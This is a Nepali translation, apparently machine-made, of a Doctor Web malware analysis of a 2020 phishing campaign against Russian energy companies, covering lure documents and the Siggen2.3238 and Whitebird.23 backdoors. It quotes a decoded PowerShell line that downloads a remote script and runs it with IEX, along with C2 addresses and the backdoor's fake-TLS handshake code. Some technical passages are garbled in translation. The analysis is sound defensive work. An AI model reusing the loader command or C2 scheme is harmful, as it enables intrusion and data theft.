हामी रूसी इन्धन र ऊर्जा परिसरमा लक्षित जासूस आक्रमणको अनुसन्धान गर्दैछौं

कम्प्यूटर सुरक्षा घटनाहरूको अनुसन्धानमा हाम्रो अनुभवले देखाउँछ कि इमेल अझै पनि आक्रमणकारीहरूले प्रयोग गर्ने सबैभन्दा सामान्य च्यानलहरू मध्ये एक हो जुन सुरुमा आक्रमण गरिएका नेटवर्क पूर्वाधारहरू घुसाउन प्रयोग गरिन्छ। संदिग्ध (वा त्यति शंकास्पद) पत्रको साथ एक लापरवाह कार्य थप संक्रमणको लागि प्रवेश बिन्दु बन्छ, त्यसैले साइबर अपराधीहरूले सक्रिय रूपमा सामाजिक इन्जिनियरिङ विधिहरू प्रयोग गरिरहेका छन्, यद्यपि सफलताको विभिन्न डिग्रीहरू छन्।

यस पोष्टमा हामी रूसी इन्धन र ऊर्जा परिसरमा धेरै उद्यमहरूलाई लक्षित स्प्याम अभियानमा हाम्रो भर्खरको अनुसन्धानको बारेमा कुरा गर्न चाहन्छौं। सबै आक्रमणहरूले नक्कली इमेलहरू प्रयोग गरेर एउटै परिदृश्यलाई पछ्याए, र कसैले पनि यी इमेलहरूको पाठ सामग्रीमा धेरै प्रयास गरेको देखिएन।

खुफिया सेवा

यो सबै अप्रिल २०२० को अन्त्यमा सुरु भयो, जब डाक्टर वेब भाइरस विश्लेषकहरूले स्प्याम अभियान पत्ता लगाए जसमा ह्याकरहरूले रूसी इन्धन र उर्जा कम्प्लेक्सका धेरै उद्यमहरूका कर्मचारीहरूलाई अपडेट गरिएको टेलिफोन निर्देशिका पठाए। निस्सन्देह, यो चिन्ताको साधारण शो थिएन, किनकि डाइरेक्टरी वास्तविक थिएन, र .docx कागजातहरूले टाढाका स्रोतहरूबाट दुई छविहरू डाउनलोड गर्यो।

ती मध्ये एउटा समाचार[.]zannews[.]com सर्भरबाट प्रयोगकर्ताको कम्प्युटरमा डाउनलोड गरिएको थियो। यो उल्लेखनीय छ कि डोमेन नाम कजाकिस्तान - zannews [.]kz को भ्रष्टाचार विरोधी मिडिया केन्द्र को डोमेन जस्तै छ। अर्कोतर्फ, प्रयोग गरिएको डोमेनले तुरुन्तै TOPNEWS भनेर चिनिने अर्को 2015 अभियानको सम्झना गराएको थियो, जसले ICEFOG ब्याकडोर प्रयोग गर्‍यो र तिनीहरूको नाममा सबस्ट्रिङ "समाचार" सहित ट्रोजन नियन्त्रण डोमेनहरू थिए। अर्को चाखलाग्दो विशेषता यो थियो कि विभिन्न प्राप्तकर्ताहरूलाई इमेलहरू पठाउँदा, छवि डाउनलोड गर्न अनुरोधहरूमा फरक अनुरोध प्यारामिटरहरू वा अद्वितीय छवि नामहरू प्रयोग गरियो।

हामी विश्वास गर्छौं कि यो "विश्वसनीय" ठेगानाको पहिचान गर्न जानकारी सङ्कलन गर्ने उद्देश्यले गरिएको हो, जसले सही समयमा पत्र खोल्ने ग्यारेन्टी गर्नेछ। SMB प्रोटोकल दोस्रो सर्भरबाट छवि डाउनलोड गर्न प्रयोग गरिएको थियो, जुन प्राप्त कागजात खोल्ने कर्मचारीहरूको कम्प्युटरबाट NetNTLM ह्यासहरू सङ्कलन गर्न सकिन्छ।

र यहाँ नक्कली डाइरेक्टरीको साथ पत्र नै छ:

यस वर्षको जुनमा, ह्याकरहरूले छविहरू अपलोड गर्न स्पोर्ट्स[.]manhajnews[.]com, नयाँ डोमेन नाम प्रयोग गर्न थाले। विश्लेषणले देखायो कि कम्तिमा सेप्टेम्बर 2019 देखि manhajnews[.]com को सबडोमेनहरू स्प्याम मेलिङहरूमा प्रयोग भइरहेको छ। यस अभियानको लक्ष्य मध्ये एक ठूलो रूसी विश्वविद्यालय थियो।

साथै, जुनमा, आक्रमणका आयोजकहरूले आफ्नो पत्रहरूको लागि नयाँ पाठ लिएर आए: यस पटक कागजातमा उद्योग विकासको बारेमा जानकारी समावेश थियो। पत्रको पाठले स्पष्ट रूपमा संकेत गर्‍यो कि यसको लेखक या त रूसी भाषाको मूल वक्ता थिएनन्, वा जानाजानी आफ्नो बारेमा यस्तो छाप सिर्जना गर्दै थिए। दुर्भाग्यवश, उद्योगको विकासका विचारहरू, सधैं जस्तै, केवल एक आवरण बन्यो - कागजातले फेरि दुई छविहरू डाउनलोड गर्यो, जबकि सर्भर डाउनलोड गर्न परिवर्तन गरियो [.]inklingpaper[.]com।

अर्को नवीनता जुलाईमा पछ्याइएको थियो। एन्टिभाइरस प्रोग्रामहरूद्वारा मालिसियस कागजातहरूको पहिचानलाई बाइपास गर्ने प्रयासमा, आक्रमणकारीहरूले पासवर्डको साथ एन्क्रिप्टेड माइक्रोसफ्ट वर्ड कागजातहरू प्रयोग गर्न थाले। एकै समयमा, आक्रमणकारीहरूले क्लासिक सामाजिक ईन्जिनियरिङ् प्रविधि - पुरस्कार सूचना प्रयोग गर्ने निर्णय गरे।

पुनरावेदनको पाठ पनि उही शैलीमा लेखिएको थियो, जसले सम्बोधनकर्तामा थप शंका उत्पन्न गर्यो। छवि डाउनलोड गर्न सर्भर पनि परिवर्तन भएन।

नोट गर्नुहोस् कि सबै अवस्थामा, पत्र पठाउनको लागि मेलमा दर्ता भएका इलेक्ट्रोनिक मेलबक्सहरू [.]ru र yandex[.]ru डोमेनहरू प्रयोग गरिन्थ्यो।

आक्रमण

सेप्टेम्बर २०२० को शुरुमा, यो कार्यको लागि समय थियो। हाम्रा भाइरस विश्लेषकहरूले आक्रमणको नयाँ लहर रेकर्ड गरे, जसमा आक्रमणकारीहरूले फेरि टेलिफोन डाइरेक्टरी अपडेट गर्ने बहानामा पत्रहरू पठाए। जे होस्, यस पटक संलग्नकमा खराब म्याक्रो समावेश छ।

संलग्न कागजात खोल्दा, म्याक्रोले दुई फाइलहरू सिर्जना गर्यो:

• VBS स्क्रिप्ट %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, जुन ब्याच फाइल सुरु गर्ने उद्देश्य थियो;
• ब्याच फाइल आफै %APPDATA%configstest.bat, जुन अस्पष्ट थियो।

यसको कामको सार केहि प्यारामिटरहरूसँग Powershell शेल सुरु गर्न तल आउँछ। शेलमा पास गरिएका प्यारामिटरहरू आदेशहरूमा डिकोड गरिएका छन्:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

प्रस्तुत आदेशहरूबाट निम्नानुसार, पेलोड डाउनलोड गरिएको डोमेनलाई फेरि समाचार साइटको रूपमा लुकाइएको छ। एक साधारण लोडर, जसको एकमात्र कार्य आदेश र नियन्त्रण सर्भरबाट शेलकोड प्राप्त गर्न र यसलाई कार्यान्वयन गर्नु हो। हामीले दुई प्रकारका ब्याकडोरहरू पहिचान गर्न सक्षम थियौं जुन पीडितको पीसीमा स्थापना गर्न सकिन्छ।

BackDoor.Siggen2.3238

पहिलो हो BackDoor.Siggen2.3238 — हाम्रा विशेषज्ञहरूले पहिले सामना गरेका थिएनन्, र अन्य एन्टिभाइरस विक्रेताहरूद्वारा यस कार्यक्रमको कुनै उल्लेख पनि थिएन।

यो कार्यक्रम C++ मा लेखिएको ब्याकडोर हो र ३२-बिट विन्डोज अपरेटिङ सिस्टमहरूमा चलिरहेको छ।

BackDoor.Siggen2.3238 दुई प्रोटोकलहरू प्रयोग गरेर व्यवस्थापन सर्भरसँग सञ्चार गर्न सक्षम छ: HTTP र HTTPS। परीक्षण गरिएको नमूनाले HTTPS प्रोटोकल प्रयोग गर्दछ। निम्न प्रयोगकर्ता-एजेन्ट सर्भरमा अनुरोधहरूमा प्रयोग गरिन्छ:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

यस अवस्थामा, सबै अनुरोधहरू निम्न प्यारामिटरहरूको सेटको साथ आपूर्ति गरिन्छ:

%s;type=%s;length=%s;realdata=%send

जहाँ प्रत्येक रेखा %s लाई समान रूपमा प्रतिस्थापन गरिएको छ:

• संक्रमित कम्प्युटरको आईडी,
• पठाइएको अनुरोध को प्रकार,
• रियलडेटा फिल्डमा डाटाको लम्बाइ,
• डाटा

संक्रमित प्रणालीको बारेमा जानकारी सङ्कलन गर्ने चरणमा, पछाडिको ढोकाले जस्तै रेखा उत्पन्न गर्दछ:

lan=%s;cmpname=%s;username=%s;version=%s;

जहाँ lan संक्रमित कम्प्युटरको IP ठेगाना हो, cmpname कम्प्युटरको नाम हो, प्रयोगकर्ता नाम प्रयोगकर्ता नाम हो, संस्करण 0.0.4.03 लाइन हो।

sysinfo पहिचानकर्तासँगको यो जानकारी https[:]//31.214[.]157.14/log.txt मा अवस्थित नियन्त्रण सर्भरमा POST अनुरोध मार्फत पठाइन्छ। यदि प्रतिक्रिया मा BackDoor.Siggen2.3238 हार्ट सिग्नल प्राप्त गर्दछ, जडान सफल मानिन्छ, र ब्याकडोरले सर्भरसँग सञ्चारको मुख्य चक्र सुरु गर्दछ।

सञ्चालन सिद्धान्तहरूको थप पूर्ण विवरण BackDoor.Siggen2.3238 हाम्रो मा छ भाइरस पुस्तकालय.

Backdoor.Whitebird.23

दोस्रो कार्यक्रम ब्याकडोरको परिमार्जन हो। व्हाइटबर्ड ब्याकडोर, कजाकिस्तानको सरकारी एजेन्सीसँग भएको घटनाबाट हामीलाई पहिले नै थाहा छ। यो संस्करण C++ मा लेखिएको छ र दुबै 32-bit र 64-bit Windows अपरेटिङ सिस्टमहरूमा चलाउन डिजाइन गरिएको छ।

यस प्रकारका धेरै कार्यक्रमहरू जस्तै, Backdoor.Whitebird.23 कन्ट्रोल सर्भर र संक्रमित कम्प्युटरको अनाधिकृत नियन्त्रणसँग इन्क्रिप्टेड जडान स्थापना गर्न डिजाइन गरिएको। ड्रपर प्रयोग गरेर सम्झौता प्रणालीमा स्थापना गरियो BackDoor.Siggen2.3244.

हामीले जाँच गरेको नमूना दुई निर्यातको साथ एक दुर्भावनापूर्ण पुस्तकालय थियो:

• गुगल प्ले
• टेस्ट गर्नुहोस्।

यसको कामको सुरुमा, यसले बाइट 0x99 को साथ XOR अपरेशनमा आधारित एल्गोरिथ्म प्रयोग गरेर ब्याकडोर बडीमा हार्डवाइर गरिएको कन्फिगरेसनलाई डिक्रिप्ट गर्दछ। कन्फिगरेसन यस्तो देखिन्छ:

struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

यसको निरन्तर सञ्चालन सुनिश्चित गर्न, ब्याकडोरले फिल्डमा निर्दिष्ट मान परिवर्तन गर्दछ काम_घण्टा कन्फिगरेसनहरू। फिल्डले 1440 बाइटहरू समावेश गर्दछ, जसले मानहरू 0 वा 1 लिन्छ र दिनमा प्रत्येक घण्टाको प्रत्येक मिनेट प्रतिनिधित्व गर्दछ। प्रत्येक नेटवर्क इन्टरफेसको लागि छुट्टै थ्रेड सिर्जना गर्दछ जसले इन्टरफेस सुन्दछ र संक्रमित कम्प्युटरबाट प्रोक्सी सर्भरमा प्राधिकरण प्याकेटहरू खोज्छ। जब यस्तो प्याकेट पत्ता लगाइन्छ, ब्याकडोरले यसको सूचीमा प्रोक्सी सर्भरको बारेमा जानकारी थप्छ। थप रूपमा, WinAPI मार्फत प्रोक्सीको उपस्थितिको लागि जाँच गर्दछ InternetQueryOptionW.

कार्यक्रमले हालको मिनेट र घण्टा जाँच गर्दछ र फिल्डमा डाटासँग तुलना गर्दछ काम_घण्टा कन्फिगरेसनहरू। यदि दिनको सम्बन्धित मिनेटको लागि मान शून्य छैन भने, त्यसपछि नियन्त्रण सर्भरसँग जडान स्थापित हुन्छ।

सर्भरमा जडान स्थापना गर्नाले क्लाइन्ट र सर्भर बीचको TLS संस्करण 1.0 प्रोटोकल प्रयोग गरेर जडानको सिर्जनालाई अनुकरण गर्दछ। ब्याकडोरको शरीरमा दुईवटा बफरहरू छन्।

पहिलो बफरले TLS 1.0 क्लाइन्ट हेलो प्याकेट समावेश गर्दछ।

दोस्रो बफरमा 1.0x0 बाइट्सको कुञ्जी लम्बाइको साथ TLS 100 क्लाइन्ट कुञ्जी एक्सचेन्ज प्याकेटहरू, परिवर्तन साइफर स्पेक, एन्क्रिप्टेड ह्यान्डसेक सन्देश समावेश छन्।

क्लाइन्ट हेलो प्याकेट पठाउँदा, ब्याकडोरले हालको समयको 4 बाइटहरू र क्लाइन्ट अनियमित फिल्डमा 28 बाइटहरू स्यूडो-यादृच्छिक डेटा लेख्छ, निम्न रूपमा गणना गरिएको छ:

v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

प्राप्त प्याकेट नियन्त्रण सर्भरमा पठाइन्छ। प्रतिक्रिया (सर्भर हेलो प्याकेट) जाँच गर्दछ:

• TLS प्रोटोकल संस्करण 1.0 संग अनुपालन;
• टाइमस्ट्याम्पको पत्राचार (रेन्डम डाटा प्याकेट फिल्डको पहिलो 4 बाइटहरू) सर्भरद्वारा निर्दिष्ट गरिएको टाइमस्ट्याम्पमा ग्राहकद्वारा निर्दिष्ट;
• क्लाइन्ट र सर्भरको अनियमित डेटा क्षेत्रमा टाइमस्ट्याम्प पछि पहिलो 4 बाइटहरूको मिलान।

निर्दिष्ट मिलानको अवस्थामा, ब्याकडोरले क्लाइन्ट कुञ्जी एक्सचेन्ज प्याकेट तयार गर्दछ। यो गर्नको लागि, यसले क्लाइन्ट कुञ्जी एक्सचेन्ज प्याकेजमा सार्वजनिक कुञ्जीलाई परिमार्जन गर्दछ, साथै एन्क्रिप्टेड ह्यान्डसेक सन्देश प्याकेजमा इन्क्रिप्सन IV र इन्क्रिप्शन डाटा।

ब्याकडोरले त्यसपछि आदेश र नियन्त्रण सर्भरबाट प्याकेट प्राप्त गर्दछ, जाँच गर्दछ कि TLS प्रोटोकल संस्करण 1.0 छ, र त्यसपछि अर्को 54 बाइटहरू (प्याकेटको मुख्य भाग) स्वीकार गर्दछ। यसले जडान सेटअप पूरा गर्दछ।

सञ्चालन सिद्धान्तहरूको थप पूर्ण विवरण Backdoor.Whitebird.23 हाम्रो मा छ भाइरस पुस्तकालय.

निष्कर्ष र निष्कर्ष

कागजातहरू, मालवेयर, र प्रयोग गरिएको पूर्वाधारको विश्लेषणले हामीलाई विश्वासका साथ भन्न अनुमति दिन्छ कि आक्रमण चिनियाँ APT समूहहरू मध्ये एकद्वारा तयार गरिएको थियो। सफल आक्रमणको घटनामा पीडितको कम्प्युटरमा स्थापित गरिएका ब्याकडोरहरूको कार्यक्षमतालाई ध्यानमा राख्दै, संक्रमणले कम्तीमा पनि आक्रमणकारी संस्थाहरूको कम्प्युटरबाट गोप्य जानकारीको चोरीमा पुग्छ।

थप रूपमा, एक धेरै सम्भावित परिदृश्य स्थानीय सर्भरहरूमा विशेष प्रकार्यको साथ विशेष ट्रोजनहरूको स्थापना हो। यी डोमेन नियन्त्रकहरू, मेल सर्भरहरू, इन्टरनेट गेटवेहरू, आदि हुन सक्छन्। हामीले उदाहरणमा देख्न सक्छौं। कजाकिस्तान मा घटना, त्यस्ता सर्भरहरू विभिन्न कारणले आक्रमणकारीहरूको लागि विशेष चासोको विषय हुन्।

स्रोत: www.habr.com